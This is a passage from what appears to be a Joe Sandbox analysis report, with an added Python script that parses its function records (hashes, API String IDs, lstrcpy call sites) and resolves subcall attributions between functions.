                              • Opcode Fuzzy Hash: 2f0e1f7bbf5a16b3085ab9a2ceb63b5698ab9c9fe71fe9a5558e879f9d0777b6
                              • Instruction Fuzzy Hash: 43111C74E12B03ABDF259F36D40D927B7F8BF44301709052DA896D7A40EB30E811CB90
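                               The function records above are easier to pivot on outside the web UI. The following is an added Python example, not part of the Joe Sandbox report or its IDA plugin: it parses a few of the records into structured data, groups functions that share an API String ID (the same API call sequence), and resolves the "Part of subcall function 00391610" attributions, which the plugin uses to list a callee's lstrcpy sites under its caller. The SAMPLE text is constructed from lines on this page; the record boundary (a new record at each "• API ID:" line) is an assumption about the report layout, not a documented format.

```python
import re
from collections import defaultdict

# Constructed input: three function records in the shape of the
# "Similarity" / "APIs" blocks above (dump-source lines trimmed to one).
SAMPLE = """\
• API ID: lstrcpylstrlen
• String ID:
• API String ID: 2001356338-0
• Opcode ID: 9e4dd264b80a248e1647b8afd12f751f28de610151af231e745d7767e6173b2c
• Instruction Fuzzy Hash: 2181F570E002099BDB25CF95DC44BEFB7B5EF84308F188269E608A7281EB759D46CB94
APIs
  • Part of subcall function 00391610: lstrcpy.KERNEL32(00000000), ref: 0039162D
  • Part of subcall function 00391610: lstrcpy.KERNEL32(00000000,?), ref: 0039164F
• lstrcpy.KERNEL32(00000000,?), ref: 00391557
• lstrcpy.KERNEL32(00000000,?), ref: 00391579
Memory Dump Source
• Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
• API ID: lstrcpy
• String ID:
• API String ID: 3722407311-0
• Opcode ID: 73a5790af25f027d40e0401157aa622a4cea4b3bb278c04448db72c3d05fadec
APIs
• lstrcpy.KERNEL32(00000000), ref: 003B15A1
• lstrcpy.KERNEL32(00000000,?), ref: 003B15D9
• API ID: lstrcpy
• String ID:
• API String ID: 3722407311-0
• Opcode ID: a886ff0499b175e5f8312ee9ce9a1e2aade1194c56eb71630a9d18168f8a7555
APIs
• lstrcpy.KERNEL32(00000000), ref: 0039162D
• lstrcpy.KERNEL32(00000000,?), ref: 0039164F
"""

FIELD_RE = re.compile(
    r"^\s*•\s*(API ID|String ID|API String ID|Opcode ID|Instruction ID|"
    r"Instruction Fuzzy Hash):\s*(.*)$"
)
# One API call line; the "Part of subcall function X:" prefix is optional.
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


def parse_records(text):
    """One dict per function; assumption: a record starts at each '• API ID:' line."""
    records, cur = [], None
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if m:
            key, val = m.group(1), m.group(2).strip()
            if key == "API ID":
                cur = {"API ID": val, "calls": []}
                records.append(cur)
            elif cur is not None:
                cur[key] = val
            continue
        m = CALL_RE.match(line)
        if m and cur is not None:
            cur["calls"].append({
                "api": m.group("api"),
                "module": m.group("mod"),
                "args": [a.strip() for a in m.group("args").split(",")],
                "ref": int(m.group("ref"), 16),
                "subcall": m.group("sub"),  # None when the site is in this function itself
            })
    return records


def direct_call_sites(rec):
    """Call-site addresses inside the function itself, not attributed to a callee."""
    return sorted(c["ref"] for c in rec["calls"] if c["subcall"] is None)


def group_by_api_string_id(records):
    """Functions with the same API String ID share the same API call sequence."""
    groups = defaultdict(list)
    for r in records:
        groups[r.get("API String ID")].append(r["Opcode ID"])
    return dict(groups)


def resolve_subcalls(records):
    """Map caller index -> {callee address: record index} by matching the refs of
    'Part of subcall function' lines against other records' direct call sites."""
    site_index = {ref: i for i, r in enumerate(records) for ref in direct_call_sites(r)}
    out = {}
    for i, r in enumerate(records):
        for c in r["calls"]:
            if c["subcall"] is not None and c["ref"] in site_index:
                out.setdefault(i, {})[int(c["subcall"], 16)] = site_index[c["ref"]]
    return out


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for sid, ids in group_by_api_string_id(recs).items():
        print(sid, [i[:12] for i in ids])
    for caller, callees in resolve_subcalls(recs).items():
        for addr, callee in callees.items():
            print(f"record {caller} calls sub_{addr:X}, which is record {callee}")
```

Run on the records in this section, the third record (Opcode ID a886ff04...) owns the call sites 0039162D and 0039164F that the first record lists as "Part of subcall function 00391610", so the resolver identifies it as the function at 00391610; the two records with API String ID 3722407311-0 are distinct functions (different Opcode and Instruction IDs) with identical API sequences, which is what the shared ID means.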